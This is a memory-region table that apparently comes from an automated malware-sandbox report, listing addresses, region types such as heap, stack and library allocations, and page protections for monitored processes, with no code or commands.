2DF4000
|
heap
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
E7E06FE000
|
stack
|
page read and write
|
||
|
506F000
|
heap
|
page read and write
|
||
|
23D99697000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
7FFAAB870000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB830000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D9783C000
|
heap
|
page read and write
|
||
|
7FFAAB960000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4905000
|
heap
|
page read and write
|
||
|
20A52000
|
heap
|
page read and write
|
||
|
486E000
|
unkown
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
23D9784B000
|
heap
|
page read and write
|
||
|
4F8E000
|
heap
|
page read and write
|
||
|
23D996A1000
|
heap
|
page read and write
|
||
|
1FFC0000
|
direct allocation
|
page read and write
|
||
|
211C0000
|
unclassified section
|
page execute and read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
49A8000
|
heap
|
page read and write
|
||
|
1C4E66DE000
|
trusted library allocation
|
page read and write
|
||
|
4970000
|
heap
|
page read and write
|
||
|
C350E3E000
|
stack
|
page read and write
|
||
|
7FFAAB920000
|
trusted library allocation
|
page read and write
|
||
|
7855000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
23D97873000
|
heap
|
page read and write
|
||
|
204BD000
|
stack
|
page read and write
|
||
|
1FFB0000
|
direct allocation
|
page read and write
|
||
|
1C4FD09C000
|
heap
|
page read and write
|
||
|
23D997FD000
|
heap
|
page read and write
|
||
|
8C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAABA00000
|
trusted library allocation
|
page read and write
|
||
|
49AA000
|
heap
|
page read and write
|
||
|
33BE000
|
stack
|
page read and write
|
||
|
74FE000
|
stack
|
page read and write
|
||
|
4F8A000
|
heap
|
page read and write
|
||
|
8C90000
|
direct allocation
|
page read and write
|
||
|
506F000
|
heap
|
page read and write
|
||
|
499E000
|
heap
|
page read and write
|
||
|
4F8E000
|
heap
|
page read and write
|
||
|
1C4E68C6000
|
trusted library allocation
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
2FCA000
|
heap
|
page read and write
|
||
|
45FE000
|
unkown
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
7FFAAB670000
|
trusted library allocation
|
page read and write
|
||
|
499D000
|
heap
|
page read and write
|
||
|
4F89000
|
heap
|
page read and write
|
||
|
7FFAAB950000
|
trusted library allocation
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
1C4E5F72000
|
trusted library allocation
|
page read and write
|
||
|
703ED000
|
unkown
|
page read and write
|
||
|
8750000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4F4D4B000
|
trusted library allocation
|
page read and write
|
||
|
C350BBF000
|
stack
|
page read and write
|
||
|
3423000
|
heap
|
page read and write
|
||
|
1C4E55F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB673000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BAE000
|
stack
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
20CAC000
|
heap
|
page read and write
|
||
|
C350DBF000
|
stack
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
20020000
|
direct allocation
|
page read and write
|
||
|
4F9F000
|
heap
|
page read and write
|
||
|
23D97AB5000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
7FFAAB680000
|
trusted library allocation
|
page read and write
|
||
|
23D997F7000
|
heap
|
page read and write
|
||
|
1C4E2C56000
|
heap
|
page read and write
|
||
|
7FFAAB8B0000
|
trusted library allocation
|
page read and write
|
||
|
4FBC000
|
heap
|
page read and write
|
||
|
5ED9000
|
trusted library allocation
|
page read and write
|
||
|
1C4E2BB0000
|
trusted library allocation
|
page read and write
|
||
|
23D9789C000
|
heap
|
page read and write
|
||
|
20A28000
|
heap
|
page read and write
|
||
|
1C4E4AD4000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
20916000
|
direct allocation
|
page execute and read and write
|
||
|
23D9783E000
|
heap
|
page read and write
|
||
|
2986000
|
stack
|
page read and write
|
||
|
8BA0000
|
trusted library allocation
|
page read and write
|
||
|
C350FBB000
|
stack
|
page read and write
|
||
|
4F8E000
|
heap
|
page read and write
|
||
|
23D9986B000
|
heap
|
page read and write
|
||
|
8931000
|
heap
|
page read and write
|
||
|
79EE000
|
stack
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
78A3000
|
heap
|
page read and write
|
||
|
49B1000
|
heap
|
page read and write
|
||
|
1C4E4EE6000
|
trusted library allocation
|
page read and write
|
||
|
4E70000
|
heap
|
page readonly
|
||
|
4991000
|
heap
|
page read and write
|
||
|
1C4E2BF0000
|
trusted library allocation
|
page read and write
|
||
|
23D977A7000
|
heap
|
page read and write
|
||
|
21140000
|
unclassified section
|
page execute and read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
49AA000
|
heap
|
page read and write
|
||
|
1C4E48AC000
|
heap
|
page read and write
|
||
|
7960000
|
heap
|
page execute and read and write
|
||
|
1C4E4ED5000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
C35097C000
|
stack
|
page read and write
|
||
|
23D99884000
|
heap
|
page read and write
|
||
|
20C7C000
|
heap
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
75D0000
|
heap
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
5073000
|
heap
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
C351B0B000
|
stack
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
23D97AB8000
|
heap
|
page read and write
|
||
|
23D997DB000
|
heap
|
page read and write
|
||
|
20C4B000
|
heap
|
page read and write
|
||
|
23D9979C000
|
heap
|
page read and write
|
||
|
85AE000
|
stack
|
page read and write
|
||
|
E7E0AFE000
|
stack
|
page read and write
|
||
|
1C4F4D3C000
|
trusted library allocation
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
20AB0000
|
heap
|
page read and write
|
||
|
23D9980F000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
20710000
|
remote allocation
|
page read and write
|
||
|
23D99816000
|
heap
|
page read and write
|
||
|
7FFAAB880000
|
trusted library allocation
|
page read and write
|
||
|
2FBE000
|
stack
|
page read and write
|
||
|
1C4E66A9000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB720000
|
trusted library allocation
|
page read and write
|
||
|
2C6A000
|
heap
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
4C1C000
|
stack
|
page read and write
|
||
|
1C4FD0B4000
|
heap
|
page read and write
|
||
|
1C4E48D0000
|
heap
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
2B33000
|
heap
|
page read and write
|
||
|
1C4E67C7000
|
trusted library allocation
|
page read and write
|
||
|
23D9783C000
|
heap
|
page read and write
|
||
|
1C4FCF90000
|
heap
|
page read and write
|
||
|
3355000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
342D000
|
heap
|
page read and write
|
||
|
5016000
|
heap
|
page read and write
|
||
|
309E000
|
stack
|
page read and write
|
||
|
E7E0BFE000
|
stack
|
page read and write
|
||
|
20901000
|
direct allocation
|
page execute and read and write
|
||
|
505D000
|
heap
|
page read and write
|
||
|
7FFAAB900000
|
trusted library allocation
|
page read and write
|
||
|
2078F000
|
stack
|
page read and write
|
||
|
88BE000
|
stack
|
page read and write
|
||
|
2FCA000
|
heap
|
page read and write
|
||
|
1C4E68AA000
|
trusted library allocation
|
page read and write
|
||
|
4B41000
|
heap
|
page read and write
|
||
|
23D97A40000
|
remote allocation
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
2057C000
|
stack
|
page read and write
|
||
|
5016000
|
heap
|
page read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
23D9788D000
|
heap
|
page read and write
|
||
|
4D90000
|
heap
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
23D977EC000
|
heap
|
page read and write
|
||
|
23D9788D000
|
heap
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB674000
|
trusted library allocation
|
page read and write
|
||
|
8527000
|
stack
|
page read and write
|
||
|
4F8E000
|
heap
|
page read and write
|
||
|
23D977D0000
|
heap
|
page read and write
|
||
|
E7E08FB000
|
stack
|
page read and write
|
||
|
23D997BC000
|
heap
|
page read and write
|
||
|
737D000
|
stack
|
page read and write
|
||
|
23D99790000
|
heap
|
page read and write
|
||
|
1FFE0000
|
direct allocation
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
49B5000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
571F000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
7320000
|
direct allocation
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
1C4FD0C1000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
7FFAAB68B000
|
trusted library allocation
|
page read and write
|
||
|
49BA000
|
heap
|
page read and write
|
||
|
49C8000
|
heap
|
page read and write
|
There are 892 hidden memdumps, click here to show them.